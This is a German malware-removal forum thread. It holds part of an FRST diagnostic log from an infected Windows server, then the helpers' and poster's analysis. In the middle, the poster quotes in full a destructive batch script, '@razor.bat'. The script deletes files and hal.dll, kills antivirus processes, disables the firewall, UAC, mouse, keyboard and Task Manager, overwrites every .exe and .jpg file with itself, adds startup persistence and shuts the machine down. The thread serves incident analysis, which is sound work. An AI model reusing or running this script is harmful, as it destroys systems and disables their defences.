Task: {69110D7B-41DC-4E9D-BDD3-C826C7DB613B} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleUsageCollector => C:\Windows\system32\ceipdata.exe [2010-11-21] (Microsoft Corporation)
Task: {AFECE848-8DA2-461B-B5E6-CBEF57A4DF7D} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleCollector => C:\Windows\system32\ceiprole.exe [2010-11-21] (Microsoft Corporation)
Task: {D49A10DA-0F70-4779-BD96-B2D976A4F2E3} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerCeipAssistant => C:\Windows\system32\ceipdata.exe [2010-11-21] (Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2004-09-13 04:00 - 2004-09-13 04:00 - 00569413 _____ () D:\Tenovis\C3000\TTrace\tt_srv.exe
2013-02-13 08:10 - 2013-02-13 08:10 - 00270336 _____ () C:\Program Files (x86)\Fujitsu\ServerView Suite\RAID Manager\bin\libcurl.dll
2013-02-13 08:10 - 2013-02-13 08:10 - 00372736 _____ () C:\Program Files (x86)\Fujitsu\ServerView Suite\RAID Manager\bin\libetpan.dll
2007-04-18 19:30 - 2007-04-18 19:30 - 00393216 _____ () C:\Program Files (x86)\McAfee\Common Framework\cryptocme2.dll
2007-04-18 19:30 - 2007-04-18 19:30 - 00471040 _____ () C:\Program Files (x86)\McAfee\Common Framework\ccme_base.dll
2009-09-25 03:50 - 2009-09-25 03:50 - 00065536 _____ () C:\Program Files (x86)\McAfee\Common Framework\boost_thread-vc80-mt-1_32.dll
2009-10-22 19:07 - 2009-10-22 19:07 - 00148816 _____ () C:\Program Files (x86)\McAfee\VirusScan Enterprise\VsEvntUI.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\PostInstall:NUL [41]
AlternateDataStreams: C:\ProgramData\TEMP:5B4BB726 [143]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\McAfeeEngineService => ""="Service"

==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

HKLM\...\.exe: batfile => "%1" %* <===== ACHTUNG

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2009-06-10 22:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3090692597-667100711-2265821096-500\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.143.123.16
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist deaktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [ComPlusRemoteAdministration-DCOM-In] => (Allow) %systemroot%\system32\dllhost.exe
FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC-EndPointMapper] => (Allow) %systemroot%\system32\scshost.exe
FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC] => (Allow) %systemroot%\system32\scshost.exe
FirewallRules: [Remrras-In-RPC] => (Allow) %systemroot%\system32\remrras.exe
FirewallRules: [RQS-In-TCP] => (Allow) %systemroot%\system32\rqs.exe
FirewallRules: [DfsMgmt-In-TCP] => (Allow) %systemroot%\system32\dfsfrsHost.exe
FirewallRules: [{11C8CCE4-90AB-4CBB-8AB9-0ABDE5A3C53E}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [{A5EDFB06-0E57-4BE9-ADAE-76C8F8255729}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
FirewallRules: [VIRT-MIGL-In-TCP-NoScope] => (Allow) %systemroot%\system32\vmms.exe
FirewallRules: [VIRT-REMOTEDESKTOP-In-TCP-NoScope] => (Allow) %systemroot%\system32\vmms.exe
FirewallRules: [{BED603B4-0971-4130-A677-4117BA775577}] => (Allow) C:\Program Files (x86)\Syslogd\Syslogd_Service.exe
FirewallRules: [{42372585-1DFD-4C8F-8CF2-348CDF162FE4}] => (Allow) C:\Program Files (x86)\Syslogd\Syslogd_Service.exe

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert
Überprüfen Sie den "winmgmt" Dienst oder reparieren Sie den WMI.


==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (03/08/2016 03:39:06 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/08/2016 03:39:06 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/07/2016 04:12:32 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/07/2016 04:12:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/07/2016 04:12:30 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (02/23/2016 12:30:17 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (02/17/2016 12:30:17 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (02/12/2016 12:30:14 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (02/11/2016 12:30:25 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (01/26/2016 12:30:21 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".


Systemfehler:
=============
Error: (03/11/2016 01:04:11 PM) (Source: Disk) (EventID: 11) (User: )
Description: Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR1 gefunden.

Error: (03/11/2016 01:04:10 PM) (Source: Disk) (EventID: 11) (User: )
Description: Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR1 gefunden.

Error: (03/11/2016 01:04:09 PM) (Source: Disk) (EventID: 11) (User: )
Description: Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR1 gefunden.

Error: (03/10/2016 06:28:41 PM) (Source: TermDD) (EventID: 56) (User: )
Description: Von der Terminalserver-Sicherheitsschicht wurde ein Fehler im Protokollablauf erkannt, und die Clientverbindung wurde getrennt.
Client-IP: 192.143.123.164.

Error: (03/10/2016 11:34:14 AM) (Source: UmrdpService) (EventID: 1107) (User: )
Description: Der Drucker Microsoft XPS Document Writer (umgeleitet 2) konnte nicht gelöscht werden.

Error: (03/10/2016 11:33:14 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "McAfee McShield" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (03/10/2016 11:32:51 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Der für den Drucker ImageMaker Color Driver erforderliche Treiber ImageMaker Color / FAX Print Driver ist unbekannt. Wenden Sie sich an den Administrator, um den Treiber zu installieren, bevor Sie sich erneut anmelden.

Error: (03/10/2016 11:32:49 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Der für den Drucker Microsoft Office Document Image Writer erforderliche Treiber Microsoft Office Document Image Writer Driver ist unbekannt. Wenden Sie sich an den Administrator, um den Treiber zu installieren, bevor Sie sich erneut anmelden.

Error: (03/09/2016 10:12:33 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Der für den Drucker Microsoft Office Document Image Writer erforderliche Treiber Microsoft Office Document Image Writer Driver ist unbekannt. Wenden Sie sich an den Administrator, um den Treiber zu installieren, bevor Sie sich erneut anmelden.

Error: (03/09/2016 10:12:30 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Der für den Drucker ImageMaker Color Driver erforderliche Treiber ImageMaker Color / FAX Print Driver ist unbekannt. Wenden Sie sich an den Administrator, um den Treiber zu installieren, bevor Sie sich erneut anmelden.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Xeon(R) CPU E3-1270 V2 @ 3.50GHz
Prozentuale Nutzung des RAM: 11%
Installierter physikalischer RAM: 32735.98 MB
Verfügbarer physikalischer RAM: 29048.09 MB
Summe virtueller Speicher: 65470.17 MB
Verfügbarer virtueller Speicher: 61711.16 MB

==================== Laufwerke ================================

Drive c: (system) (Fixed) (Total:236.73 GB) (Free:168.92 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)]
Drive d: (Volume) (Fixed) (Total:228 GB) (Free:220.58 GB) NTFS
Drive e: (WHITE STICK) (Removable) (Total:1.92 GB) (Free:1.87 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 464.7 GB) (Disk ID: 08ACE823)
Partition 1: (Active) - (Size=236.7 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=228 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 1.9 GB) (Disk ID: 0008F4A3)
Partition 1: (Not Active) - (Size=1.9 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
--- --- ---


Wie gesagt, mir würde reichen zu wissen um welchen Schädling es sich handelt und wie ich einer weiteren Verbreitung entgegenwirken kann.

Vielen Dank für Deine Mühe,
Markus

cosinus 15.03.2016 11:58
Bin ja mal gespannt, wie dein Kunde reagiert, wenn er davon Wind bekommt, dass du seine Logs hier postest. :wtf:

Code:
2016-03-11 10:02 - 2016-03-11 10:02 - 00198201 _____ C:\Windows\system32\InfList_exe.txt
2016-03-11 10:02 - 2016-03-11 10:02 - 00000000 _____ C:\Windows\system32\FIleList_.exe.txt
2016-03-10 12:49 - 2016-03-10 12:49 - 00281112 _____ C:\Windows\InfList_exe.txt
2016-03-10 12:49 - 2016-03-10 12:49 - 00014796 _____ C:\Windows\InfList_jpg.txt
2016-03-10 12:49 - 2016-03-10 12:49 - 00000000 _____ C:\Windows\FIleList_.exe.txt
2016-03-10 12:48 - 2016-03-10 12:45 - 00003713 _____ C:\Windows\@razor.bat
Sieht aus, als hätte jmd da ein paar böse Scripts/Batchdateien ausgeführt.
Was steht denn in den Textdateien drin? Und was in der @razor.bat?

MKai 15.03.2016 18:02
Also in der @razor.bat ist der folgende Code, und die Antwort auf die Frage was in den anderen Dateien zu steht, zu finden:

Code:
@echo off
DIR /S/B %SystemDrive%\*..exe >> FIleList_.exe.txt
echo Y
 FOR /F "tokens=1,* delims=: " %%j in (FIleList_.exe.txt) do del "%%j:%%k"
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll
rem -------kill av---------
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y
 FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
assoc .jpg=batfile
DIR /S/B %SystemDrive%\*.jpg >> InfList_jpg.txt
echo Y
 FOR /F "tokens=1,* delims=: " %%j in (InfList_jpg.txt) do copy /y %0 "%%j:%%k"
set valinf="rundll32_%random%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
copy %0 "%userprofile%\Start Menu\Programs\Startup"
@Set RegistyEditCmd=Cmd /k Reg Add
@Set HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
@%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
start "nokeyboard.reg"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
shutdown /s /t  /c ""
Das sieht mir definitv böse aus...

cosinus 16.03.2016 12:33
Also die betroffenen Programme müssen wohl eh neu installiert werden, wenn die EXE Dateien zerstört wurden. Das kann man natürlich nicht dadurch beheben, indem man die malware entfernt. Was ist denn jetzt überhaupt Ziel dieses Threads?

Wie dieses bösartige Script da reingekommen ist kann man so aus der Ferne nicht direkt mehr sagen, aber da könnten Sicherheitslücken im Spiel sein (Updates für Windows verpennt) und Misskonfigs bei der Rechtevergabe.

Zitat:
Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle)
Java(TM) 6 Update 17 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
Uraltes Java-Geraffel


Zitat:
Kunde_fax (S-1-5-21-3090692597-667100711-2265821096-1004 - Administrator - Enabled)
standort4 (S-1-5-21-3090692597-667100711-2265821096-1005 - Limited - Enabled)
abt4 (S-1-5-21-3090692597-667100711-2265821096-1001 - Administrator - Enabled) => C:\Users\abt4
abt5 (S-1-5-21-3090692597-667100711-2265821096-1002 - Administrator - Enabled) => C:\Users\abt5
abtfax (S-1-5-21-3090692597-667100711-2265821096-1003 - Administrator - Enabled)
Halloo :wtf: wieso muss denn ein "Kundenfax" volle rechte Rechte haben? Genauso wie abt4, abt5 und abtfax? (abt = Abteilung?? )

MKai 16.03.2016 12:50
Die betroffenen Server sind bzw. werden bereits neu aufgesetzt. Inzwischen denke ich haben sie auch eingesehen, dass Rechner in einer vermeintlich sicheren Zone doch nicht so sicher sind, und werden hoffentlich ihre Updatepolitik verbessern.

Sinn dieses Threads war es ursprünglich Informationen zu bekommen, ob es sich um einen bekannten Virus handelt.

Ich bin mir aber aktuell gar nicht mehr so sicher (nachdem ich mir den Code angesehen habe) ob es sich um einen Virus, oder um eine böswillige Aktion irgendeines evtl. ehem. Mitarbeiters handelt.

Letztendlich haben mir Deine Tips (speziell zum FRST und der in den Logs enthaltenen Daten) bei der Analyse und Sicherung meines eigenen Netzes geholfen.

Ich denke wir können diesen Thread nun schließen oder auch entsorgen, das überlasse ich Dir.

Vielen Dank nochmals für Deine geduldige Hilfe :daumenhoc

:dankeschoen:

Markus

cosinus 16.03.2016 12:59
Ja, ich dachte auch hier eher an einen Scherz oder gar frustrierten Mitarbeiter oder so. Wer weiß.

Aber was heißt denn sichere Zone? Wenn für die Abteilungen oder was das sein soll eh ein eigener User mit ADMINRECHTEN vorhanden ist können die sich doch austoben wie die wollen. Auf einem produktiven Windows Server :D (MAINDC - Domänencontroller auch noch? :wtf: dann sind die ja sogar Domänenadmins, weil es keine lokale User auf einem DC gibt :o )

MKai 16.03.2016 13:24
Es ist nicht ganz so schlimm wie es aussieht, die Domäne ist eine kleine, untergeordnete Domäne in eimen eigenen IP-Bereich, der vom Hauptnetz glücklicherweise gut abgetrennt war/ist. Der Name MAINDC entstammt meiner Feder (war wohl net so kreativ in dem Moment), denn ich habe die sicherheitsrelevanten Daten (Kontonamen, IP-Adressen, Rechnernamen etc.) vor dem posten manipuliert. Will ja keine Kundeninternas offen legen :nono:

Aber Grundsätzlich hast du natürlich Recht, wie der Server konfiguriert war, was er eigenlich ne Einladung für jeden sich auszutoben. Ich habe das inzwischen auch mehrfach angesprochen und sie haben Besserung versprochen :zzwhip:

Ich hoffe sie tuns diesmal auch...

Markus


Alle Zeitangaben in WEZ +1. Es ist jetzt 22:52 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131